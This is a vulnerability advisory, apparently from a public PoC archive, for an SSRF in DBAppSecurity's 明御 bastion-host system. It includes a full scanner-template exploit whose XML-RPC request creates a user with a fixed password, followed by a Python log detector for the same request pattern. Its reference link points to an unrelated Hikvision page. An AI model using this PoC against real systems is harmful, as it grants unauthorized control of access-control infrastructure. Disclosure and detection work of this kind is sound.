dbappsecurity-mingyu-xmlrpc-sock-adduser: 安恒 (DBAppSecurity) 明御运维审计与风险控制系统 xmlrpc.sock arbitrary user creation vulnerability

Date: 2025-09-01 | Affected software: 安恒 明御运维审计与风险控制系统 | PoC: public

Vulnerability description

The xmlrpc.sock interface of 安恒 明御运维审计与风险控制系统 is reachable through an SSRF: the /service/ endpoint can be pointed at the local socket /var/run/rpc/xmlrpc.sock, and the XML-RPC method web.user_add exposed there adds an arbitrary user, which gives control of the bastion host. FOFA: "明御运维审计与风险控制系统"

PoC code [public]

id: dbappsecurity-mingyu-xmlrpc-sock-adduser

info:
  name: 安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    安恒 明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加任意用户控制堡垒机
    FOFA: "明御运维审计与风险控制系统"
  reference:
    - https://peiqi.wgpsec.org/wiki/iot/HIKVISION/HiKVISION%20综合安防管理平台%20env%20信息泄漏漏洞.html
  tags: dbappsecurity,adduser
  created: 2023/08/10

set:
  uname: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://{{uname}}/wsrpc
      body: |
        <?xml version="1.0"?>
        <methodCall>
        <methodName>web.user_add</methodName>
        <params>
        <param>
        <value>
        <array>
        <data>
        <value>
        <string>admin</string>
        </value>
        <value>
        <string>5</string>
        </value>
        <value>
        <string>10.0.0.1</string>
        </value>
        </data>
        </array>
        </value>
        </param>
        <param>
        <value>
        <struct>
        <member>
        <name>uname</name>
        <value>
        <string>{{uname}}</string>
        </value>
        </member>
        <member>
        <name>name</name>
        <value>
        <string>{{uname}}</string>
        </value>
        </member>
        <member>
        <name>pwd</name>
        <value>
        <string>1qaz@3edC12345</string>
        </value>
        </member>
        <member>
        <name>authmode</name>
        <value>
        <string>1</string>
        </value>
        </member>
        <member>
        <name>deptid</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>email</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>mobile</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>comment</name>
        <value>
        <string></string>
        </value>
        </member>
        <member>
        <name>roleid</name>
        <value>
        <string>102</string>
        </value>
        </member>
        </struct></value>
        </param>
        </params>
        </methodCall>
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'<methodResponse>') &&
      response.body.bcontains(b'<params>') &&
      response.body.bcontains(b'"uname":') &&
      response.body.bcontains(b'"mtime":') &&
      response.body.bcontains(b'"rolename":') &&
      response.body.bcontains(bytes(uname))
    extractors:
      - type: regex
        extractor:
          ext1: '"\"uname\": \"(?P<user>.*?)\"".bsubmatch(response.body)'
          user: ext1["user"]
      - type: word
        extractor:
          pass: "1qaz@3edC12345"
expression: r0()
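Detection logic for the request pattern above, added here as an example that is not part of the original page or of the product: it scans web-server access-log lines (the sample lines are constructed, with a made-up random hostname in place of {{uname}}) for /service/ requests whose query forwards to a unix: socket at xmlrpc.sock, after undoing URL encoding, and it also flags the more general case of any unix: target that contains path traversal.

```python
from __future__ import annotations
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page). Line 2 carries the PoC's
# request path verbatim, line 3 the same path URL-encoded; lines 1 and 4 are benign.
SAMPLE_LOG = """\
10.1.2.3 - - [01/Sep/2025:10:00:01 +0800] "GET /service/?wsdl HTTP/1.1" 200 1843
10.1.2.9 - - [01/Sep/2025:10:00:07 +0800] "POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://kqzmxp/wsrpc HTTP/1.1" 200 412
10.1.2.9 - - [01/Sep/2025:10:00:09 +0800] "POST /service/?unix%3A%2F..%2F..%2F..%2F..%2Fvar%2Frun%2Frpc%2Fxmlrpc.sock%7Chttp%3A%2F%2Fkqzmxp%2Fwsrpc HTTP/1.1" 200 412
10.1.2.4 - - [01/Sep/2025:10:01:00 +0800] "GET /static/docs/xmlrpc.sock.txt HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode up to `rounds` times so double-encoded targets normalise too."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target.lower()

def classify_request(target: str) -> str | None:
    """Return a reason string when the request target matches the xmlrpc.sock SSRF pattern."""
    path, _, query = decode_target(target).partition("?")
    if not path.startswith("/service/"):
        return None
    if "unix:" in query and "xmlrpc.sock" in query:
        return "unix: socket target pointing at xmlrpc.sock via /service/"
    if "unix:" in query and "../" in query:
        return "unix: socket target with path traversal via /service/"
    return None

def scan_log(text: str) -> list[dict]:
    """Scan access-log text and return one finding per matching line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reason = classify_request(m.group("target"))
        if reason:
            findings.append({"line": lineno, "client": line.split()[0],
                             "method": m.group("method"), "reason": reason})
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```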
